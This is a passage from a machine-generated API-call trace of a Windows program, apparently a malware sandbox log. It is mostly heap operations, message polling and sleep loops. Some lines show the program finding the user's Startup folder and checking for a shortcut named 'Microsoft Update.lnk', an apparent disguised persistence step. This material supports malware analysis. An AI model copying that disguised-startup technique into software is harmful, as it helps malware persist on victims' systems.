Flags=0x0, Size=0x10) returned 0x2aab9f8 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0251.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0251.251] FreeLibrary (hLibModule=0x76240000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0251.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0251.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0251.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0251.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0251.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0251.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0251.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0251.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0251.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0251.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0251.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0251.257] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0251.257] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0251.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.258] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0251.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0251.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0251.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0251.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0251.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0251.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.259] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0251.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0251.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0251.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0251.488] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0251.488] TranslateMessage (lpMsg=0x8cf968) returned 0 [0251.488] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0251.488] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0251.488] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0251.488] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0251.489] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0251.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0251.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0251.490] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0251.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0251.491] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0251.491] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0251.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0251.491] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0251.492] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.492] timeGetTime () returned 0x117ebbe [0251.492] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.492] Sleep (dwMilliseconds=0xa) [0251.564] timeGetTime () returned 0x117ec0c [0251.564] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.564] Sleep (dwMilliseconds=0xa) [0251.638] timeGetTime () returned 0x117ec5a [0251.638] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.638] Sleep (dwMilliseconds=0xa) [0251.673] timeGetTime () returned 0x117ec7a [0251.673] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.673] Sleep (dwMilliseconds=0xa) [0251.716] timeGetTime () returned 0x117eca9 [0251.716] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.716] Sleep (dwMilliseconds=0xa) [0251.731] timeGetTime () returned 0x117ecb8 [0251.732] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.732] Sleep (dwMilliseconds=0xa) [0251.747] timeGetTime () returned 0x117ecc8 [0251.747] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.747] Sleep (dwMilliseconds=0xa) [0251.773] timeGetTime () returned 0x117ecd7 [0251.773] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.773] Sleep (dwMilliseconds=0xa) [0251.809] timeGetTime () returned 0x117ecf7 [0251.809] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.809] Sleep (dwMilliseconds=0xa) [0251.835] timeGetTime () returned 0x117ed16 [0251.835] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.835] Sleep (dwMilliseconds=0xa) [0251.863] timeGetTime () returned 0x117ed35 [0251.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.863] Sleep (dwMilliseconds=0xa) [0251.889] timeGetTime () returned 0x117ed54 [0251.889] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.889] Sleep (dwMilliseconds=0xa) [0251.909] timeGetTime () returned 0x117ed64 [0251.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.909] Sleep (dwMilliseconds=0xa) [0251.948] timeGetTime () returned 0x117ed85 [0251.948] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.948] Sleep (dwMilliseconds=0xa) [0251.966] timeGetTime () returned 0x117eda3 [0251.966] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, 